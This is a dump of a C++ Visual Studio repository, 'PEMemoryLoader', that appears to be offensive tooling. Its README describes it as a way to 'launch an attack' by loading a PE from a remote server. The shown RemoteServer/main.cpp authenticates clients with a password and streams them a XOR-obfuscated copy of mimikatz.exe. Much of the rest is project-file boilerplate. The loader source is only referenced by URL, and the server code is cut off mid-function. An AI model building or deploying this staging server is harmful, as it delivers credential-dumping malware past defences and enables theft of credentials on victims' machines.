├── PELoader
    ├── PELoader.vcxproj
    ├── PELoader.vcxproj.filters
    ├── PELoader.vcxproj.user
    └── main.cpp
├── PEMemoryLoader.sln
├── README.md
├── RemoteServer
    ├── RemoteServer.vcxproj
    ├── RemoteServer.vcxproj.filters
    ├── RemoteServer.vcxproj.user
    └── main.cpp
└── x64
    └── Debug
        ├── config.txt
        └── mimikatz.exe


/PELoader/PELoader.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{17e32568-a2ea-455a-888d-97d6bc740195}</ProjectGuid>
 25 |     <RootNamespace>PELoader</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>TurnOffAllWarnings</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>false</ConformanceMode>
119 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
120 |     </ClCompile>
121 |     <Link>
122 |       <SubSystem>Console</SubSystem>
123 |       <GenerateDebugInformation>true</GenerateDebugInformation>
124 |     </Link>
125 |   </ItemDefinitionGroup>
126 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
127 |     <ClCompile>
128 |       <WarningLevel>Level3</WarningLevel>
129 |       <FunctionLevelLinking>true</FunctionLevelLinking>
130 |       <IntrinsicFunctions>true</IntrinsicFunctions>
131 |       <SDLCheck>true</SDLCheck>
132 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133 |       <ConformanceMode>true</ConformanceMode>
134 |     </ClCompile>
135 |     <Link>
136 |       <SubSystem>Console</SubSystem>
137 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
138 |       <OptimizeReferences>true</OptimizeReferences>
139 |       <GenerateDebugInformation>true</GenerateDebugInformation>
140 |     </Link>
141 |   </ItemDefinitionGroup>
142 |   <ItemGroup>
143 |     <ClCompile Include="main.cpp" />
144 |   </ItemGroup>
145 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
146 |   <ImportGroup Label="ExtensionTargets">
147 |   </ImportGroup>
148 | </Project>


--------------------------------------------------------------------------------
/PELoader/PELoader.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/PELoader/PELoader.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/PELoader/main.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aplyc1a/PEMemoryLoader/f4f67fd80db104a6a55bbe43d523ed0442e5d8a8/PELoader/main.cpp


--------------------------------------------------------------------------------
/PEMemoryLoader.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31515.178
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RemoteServer", "RemoteServer\RemoteServer.vcxproj", "{600AECF3-7308-40BA-BEE6-787A67A5A8D3}"
 7 | EndProject
 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PELoader", "PELoader\PELoader.vcxproj", "{17E32568-A2EA-455A-888D-97D6BC740195}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|x64 = Debug|x64
13 | 		Debug|x86 = Debug|x86
14 | 		Release|x64 = Release|x64
15 | 		Release|x86 = Release|x86
16 | 	EndGlobalSection
17 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Debug|x64.Build.0 = Debug|x64
20 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Debug|x86.ActiveCfg = Debug|Win32
21 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Debug|x86.Build.0 = Debug|Win32
22 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Release|x64.ActiveCfg = Release|x64
23 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Release|x64.Build.0 = Release|x64
24 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Release|x86.ActiveCfg = Release|Win32
25 | 		{600AECF3-7308-40BA-BEE6-787A67A5A8D3}.Release|x86.Build.0 = Release|Win32
26 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Debug|x64.ActiveCfg = Debug|x64
27 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Debug|x64.Build.0 = Debug|x64
28 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Debug|x86.ActiveCfg = Debug|Win32
29 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Debug|x86.Build.0 = Debug|Win32
30 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Release|x64.ActiveCfg = Release|x64
31 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Release|x64.Build.0 = Release|x64
32 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Release|x86.ActiveCfg = Release|Win32
33 | 		{17E32568-A2EA-455A-888D-97D6BC740195}.Release|x86.Build.0 = Release|Win32
34 | 	EndGlobalSection
35 | 	GlobalSection(SolutionProperties) = preSolution
36 | 		HideSolutionNode = FALSE
37 | 	EndGlobalSection
38 | 	GlobalSection(ExtensibilityGlobals) = postSolution
39 | 		SolutionGuid = {6954B3A0-05FA-4200-9575-BE9F1215D06A}
40 | 	EndGlobalSection
41 | EndGlobal
42 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # PEMemoryLoader
 2 | 
 3 | Load static-compiled PE from remote server.
 4 | 
 5 | ## Principle Introduction
 6 | 
 7 | To launch an attack, you should run the RemoteServer first. The RemoteServer is used to provide Encrypted PE after requested (Of course client need to pass authorization before downloading the PE).
 8 | 
 9 | Before run the PELoader,You should filling the server's information in config.txt (IP 、port、auth-password).
10 | 
11 | 在开始实施攻击前，你需要先运行RemoteServer。这个服务器用来向客户端PELoader提供被加密的PE文件，PELoader想要获取到这个PE文件是需要匹配authcode进行鉴权的。
12 | 
13 | 做好RemoteServer的准备工作后，可以在PELoader所在的目录下创建config.txt并填入RemoteServer的IP、端口、密码等信息。之后运行PELoader即可。
14 | 
15 | ## Compile
16 | 
17 | Compile the project with visual studio.
18 | 
19 | 使用vs进行编译即可。
20 | 
21 | ## Usage
22 | 
23 | ### server
24 | 
25 | ```shell
26 | .\RemoteServer.exe [port] [PEPath] [authcode]
27 | ```
28 | 
29 | ### client
30 | 
31 | 编辑config.txt
32 | 
33 | ```text
34 | ip = 192.168.1.123
35 | port = 37261
36 | authcode = 654123
37 | ```
38 | 
39 | 之后运行PELoader
40 | 
41 | ```shell
42 | .\PELoader.exe
43 | ```
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/RemoteServer/RemoteServer.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{600aecf3-7308-40ba-bee6-787a67a5a8d3}</ProjectGuid>
 25 |     <RootNamespace>RemoteServer</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>TurnOffAllWarnings</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>false</ConformanceMode>
119 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
120 |     </ClCompile>
121 |     <Link>
122 |       <SubSystem>Console</SubSystem>
123 |       <GenerateDebugInformation>true</GenerateDebugInformation>
124 |     </Link>
125 |   </ItemDefinitionGroup>
126 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
127 |     <ClCompile>
128 |       <WarningLevel>Level3</WarningLevel>
129 |       <FunctionLevelLinking>true</FunctionLevelLinking>
130 |       <IntrinsicFunctions>true</IntrinsicFunctions>
131 |       <SDLCheck>true</SDLCheck>
132 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133 |       <ConformanceMode>true</ConformanceMode>
134 |     </ClCompile>
135 |     <Link>
136 |       <SubSystem>Console</SubSystem>
137 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
138 |       <OptimizeReferences>true</OptimizeReferences>
139 |       <GenerateDebugInformation>true</GenerateDebugInformation>
140 |     </Link>
141 |   </ItemDefinitionGroup>
142 |   <ItemGroup>
143 |     <ClCompile Include="main.cpp" />
144 |   </ItemGroup>
145 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
146 |   <ImportGroup Label="ExtensionTargets">
147 |   </ImportGroup>
148 | </Project>


--------------------------------------------------------------------------------
/RemoteServer/RemoteServer.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/RemoteServer/RemoteServer.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/RemoteServer/main.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <winsock2.h>
  3 | #include <windows.h>
  4 | #pragma warning (disable: 4996)
  5 | #pragma comment(lib,"ws2_32.lib")
  6 | 
  7 |  ///////////////////////////////////////////////
  8 |  //          CONFIGURATION   HERE             //
  9 |  ///////////////////////////////////////////////
 10 | #define DEFAULT_PORT 6666
 11 | #define MAX_CONNNUM 999
 12 | #define CHUNK_SIZE 200
 13 | #define USLEEP_TIME 0
 14 | char authcode[50] = "123456";
 15 | char peName[100] = "mimikatz.exe";
 16 | char encryptBin[100] = "artifact.bin";
 17 | ///////////////////////////////////////////////
 18 | //          CONFIGURATION   DONE             //
 19 | ///////////////////////////////////////////////
 20 | 
 21 | typedef struct clients_node {
 22 |     SOCKET socketClient;
 23 |     struct sockaddr_in cSin;
 24 |     int isRunning;
 25 |     HANDLE h;
 26 | }stClientNode, * clientNode;
 27 | 
 28 | static stClientNode clients[MAX_CONNNUM] = { 0 };
 29 | static SOCKET sockfdServer;
 30 | static struct sockaddr_in s_sin;
 31 | static int clientNum = 0;
 32 | 
 33 | static void analysis(char* data, int datal, clientNode node_t) {
 34 |     printf("=====>|%s:%d:<%d>|:%s \n", inet_ntoa(node_t->cSin.sin_addr), node_t->cSin.sin_port, datal, data);
 35 | }
 36 | 
 37 | DWORD WINAPI eventHandle(LPVOID lpParameter) {
 38 |     char revData[256];
 39 |     int ret;
 40 |     char buff[CHUNK_SIZE];
 41 |     char stage1Data[20];
 42 |     int i = 0;
 43 |     long long len = 0;
 44 |     clientNode node = (clientNode)lpParameter;
 45 |     //printf("[+] %s:%d is knocking... \n", inet_ntoa(node->cSin.sin_addr), node->cSin.sin_port);
 46 |     FILE* fp = fopen(encryptBin, "rb");
 47 |     if (fp == NULL) return 0;
 48 | 
 49 |     fseek(fp, 0, SEEK_END);
 50 |     len = ftell(fp);
 51 |     rewind(fp);
 52 | 
 53 |     recv(node->socketClient, revData, sizeof(revData), 0);
 54 |     if (strcmp(revData, authcode) != 0)
 55 |     {
 56 |         printf("[Error] auth failed\n");
 57 |         printf("AUTH: %s\n", revData);
 58 |         send(node->socketClient, "EF", strlen("EF"), 0);
 59 |         return 1;
 60 |     }
 61 | 
 62 |     sprintf(stage1Data, "V %ld", len);
 63 |     send(node->socketClient, stage1Data, sizeof(stage1Data), 0);
 64 | 
 65 |     while (1) {
 66 |         memset(buff, 0, sizeof(buff));
 67 |         if (i + sizeof(buff) > len) {
 68 |             ret = fread(buff, 1, i + sizeof(buff) - len, fp);
 69 |             send(node->socketClient, buff, i + sizeof(buff) - len, 0);
 70 |             break;
 71 |         }
 72 |         else {
 73 |             ret = fread(buff, 1, sizeof(buff), fp);
 74 |             send(node->socketClient, buff, sizeof(buff), 0);
 75 |             i = i + sizeof(buff);
 76 |         }
 77 |         Sleep(USLEEP_TIME);
 78 |     }
 79 |     node->isRunning = 0;
 80 |     clientNum--;
 81 |     fclose(fp);
 82 |     return 1;
 83 | }
 84 | 
 85 | 
 86 | void xorLoopEncryptor(unsigned char* data, unsigned int size) {
 87 |     unsigned int j = 0;
 88 |     for (unsigned int i = 0; i < (size - 1); i++) {
 89 |         j = i + 1;
 90 |         if (i == size - 2) {
 91 |             j = j - size + 1;
 92 |         }
 93 |         data[i] = data[i] ^ data[j] + size;
 94 |     }
 95 | }
 96 | 
 97 | void xorChunkEncryptor(unsigned char* data, unsigned int size, unsigned int chunk_max_size) {
 98 |     unsigned int offset = 0;
 99 |     unsigned int chunk_size = 0;
100 |     while (1) {
101 |         if (offset + chunk_max_size > size) {
102 |             chunk_size = size - offset;
103 |         }
104 |         else {
105 |             chunk_size = chunk_max_size;
106 |         }
107 |         xorLoopEncryptor(data + offset, chunk_size);
108 |         offset += chunk_max_size;
109 |         if (offset >= size) break;
110 |     }
111 | }
112 | 
113 | void doPEEncryptor() {
114 |     LONGLONG PELength = -1;
115 |     FILE* fp;
116 |     BYTE* PEBuffer;
117 |     errno_t err;
118 |     unsigned int chksum = 0;
119 | 
120 |     printf("[+] Encrypt the file to be loaded...\n");
121 |     fp = fopen(peName, "rb");
122 |     fseek(fp, 0, SEEK_END);
123 |     PELength = ftell(fp);
124 |     rewind(fp);
125 |     PEBuffer = (BYTE*)malloc((PELength + 1) * sizeof(char));
126 |     fread(PEBuffer, PELength, 1, fp);
127 | 
128 |     for (long long i = 0; i < PELength; i++) { chksum = PEBuffer[i] * i + chksum / 3; };
129 |     fclose(fp);
130 |     xorChunkEncryptor(PEBuffer, PELength, 1000);
131 | 
132 |     //printf("---  %s:%ldBytes <chksum:%ud>        -->     %s:%ldBytes        >\n", peName, PELength, chksum,encryptBin, PELength);
